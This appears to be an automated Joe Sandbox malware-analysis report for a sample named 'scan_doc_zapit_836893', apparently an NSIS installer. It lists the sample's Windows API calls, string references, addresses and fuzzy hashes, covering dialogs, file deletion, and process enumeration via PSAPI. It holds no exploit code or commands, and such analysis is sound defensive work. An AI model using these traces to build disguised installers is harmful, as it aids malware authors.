                                                      • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                      • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                      • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                      • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                      • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                      • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                      APIs
                                                      • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                      • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                      • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                      • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                      • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                      • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                      • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                      • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                      • DeleteObject.GDI32(?), ref: 00404A79
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                      • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                      • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                      • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                      • ShowWindow.USER32(00000000), ref: 00404F5B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $ @$M$N
                                                      • API String ID: 1638840714-3479655940
                                                      • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                      • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                      • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                      • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                      • SetWindowTextW.USER32(?,?), ref: 00404583
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                      • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                      • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                        • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                        • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                        • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                      • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                      • String ID: 82D$@%F$@rD$A
                                                      • API String ID: 3347642858-1086125096
                                                      • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                      • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                      • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                      • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                      • CloseHandle.KERNEL32(?), ref: 004071E6
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                      • API String ID: 1916479912-1189179171
                                                      • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                      • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                      • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                      • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                      • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                      • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                      • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                      • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                      • FindClose.KERNEL32(?), ref: 00406E33
                                                      Strings
                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                      • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                      • \*.*, xrefs: 00406D03
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                      • API String ID: 2035342205-3294556389
                                                      • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                      • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                      • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                      • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                      APIs
                                                      • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                      • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                      • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                      • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 3581403547-784952888
                                                      • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                      • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                      • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                      • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                      APIs
                                                      • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                      Strings
                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                      • API String ID: 542301482-1377821865
                                                      • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                      • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                      • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                      • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                      • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                      • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                      • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                      • lstrlenW.KERNEL32(?), ref: 004063CC
                                                      • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                        • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                      • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                      • GlobalFree.KERNEL32(?), ref: 004064DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                      • API String ID: 20674999-2124804629
                                                      • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                      • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                      • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                      • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                      • GetSysColor.USER32(?), ref: 004041AF
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                      • lstrlenW.KERNEL32(?), ref: 004041D6
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                        • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                        • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                        • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                      • SendMessageW.USER32(00000000), ref: 00404251
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                      • SetCursor.USER32(00000000), ref: 004042D2
                                                      • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                      • SetCursor.USER32(00000000), ref: 004042F6
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
